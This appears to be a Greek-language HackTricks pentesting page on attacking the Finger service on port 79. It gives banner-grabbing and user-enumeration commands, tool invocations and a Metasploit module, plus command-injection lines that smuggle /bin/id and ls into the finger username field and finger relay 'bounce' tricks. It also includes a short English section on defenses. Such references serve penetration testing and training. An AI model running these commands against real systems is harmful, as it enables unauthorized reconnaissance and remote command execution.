7.6 KiB
79 - Ελεγκτική δοκιμή Finger
Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι υποστήριξης του HackTricks:
- Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε The PEASS Family, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.
Βασικές πληροφορίες
Το πρόγραμμα/υπηρεσία Finger χρησιμοποιείται για την ανάκτηση λεπτομερειών σχετικά με τους χρήστες υπολογιστών. Συνήθως, οι παρεχόμενες πληροφορίες περιλαμβάνουν το όνομα σύνδεσης του χρήστη, το πλήρες όνομα και, σε ορισμένες περιπτώσεις, επιπλέον λεπτομέρειες. Αυτές οι επιπλέον λεπτομέρειες μπορεί να περιλαμβάνουν την τοποθεσία του γραφείου και τον αριθμό τηλεφώνου (εάν είναι διαθέσιμος), την ώρα που συνδέθηκε ο χρήστης, την περίοδο αδράνειας (χρόνος αδράνειας), την τελευταία φορά που ο χρήστης διάβασε το email και το περιεχόμενο των αρχείων σχεδίου και έργου του χρήστη.
Προεπιλεγμένη θύρα: 79
PORT STATE SERVICE
79/tcp open finger
Απαρίθμηση
Ανάκτηση Μπάνερ/Βασική σύνδεση
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
Απαρίθμηση χρηστών
User enumeration is the process of gathering information about valid usernames on a target system. This information can be used by attackers to launch further attacks, such as brute-forcing passwords or attempting to gain unauthorized access to user accounts.
There are several methods that can be used to perform user enumeration, including:
-
Finger service: The Finger service is a network protocol that allows users to retrieve information about other users on a remote system. Attackers can use this service to query the target system and obtain a list of valid usernames.
-
Username guessing: Attackers can attempt to guess valid usernames by using common naming conventions, such as first names, last names, or combinations of the two. They can also use publicly available information, such as social media profiles or company directories, to gather potential usernames.
-
User enumeration tools: There are various tools available that automate the process of user enumeration. These tools can perform tasks such as querying the Finger service, brute-forcing usernames, or scraping websites for potential usernames.
To protect against user enumeration attacks, it is important to implement proper security measures, such as:
-
Disable Finger service: If the Finger service is not required, it is recommended to disable it to prevent attackers from querying the system for user information.
-
Implement account lockouts: Implementing account lockouts after a certain number of failed login attempts can help prevent brute-force attacks.
-
Use strong and unique usernames: Avoid using common naming conventions for usernames and ensure that each user has a unique username that is not easily guessable.
-
Monitor and log failed login attempts: Monitoring and logging failed login attempts can help identify potential user enumeration attacks and allow for timely response and mitigation.
By understanding the techniques used in user enumeration attacks and implementing proper security measures, organizations can better protect their systems and user accounts from unauthorized access.
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
Εναλλακτικά, μπορείτε να χρησιμοποιήσετε το finger-user-enum από το pentestmonkey, μερικά παραδείγματα:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Το Nmap εκτελεί ένα script για να κάνει χρήση των προεπιλεγμένων scripts
Το Metasploit χρησιμοποιεί περισσότερα κόλπα από το Nmap
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
Εκτέλεση εντολής
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Αναπήδηση του Finger
Χρησιμοποιήστε ένα σύστημα ως αναμεταδότης του finger
finger user@host@victim
finger @internal@external
Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
- Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.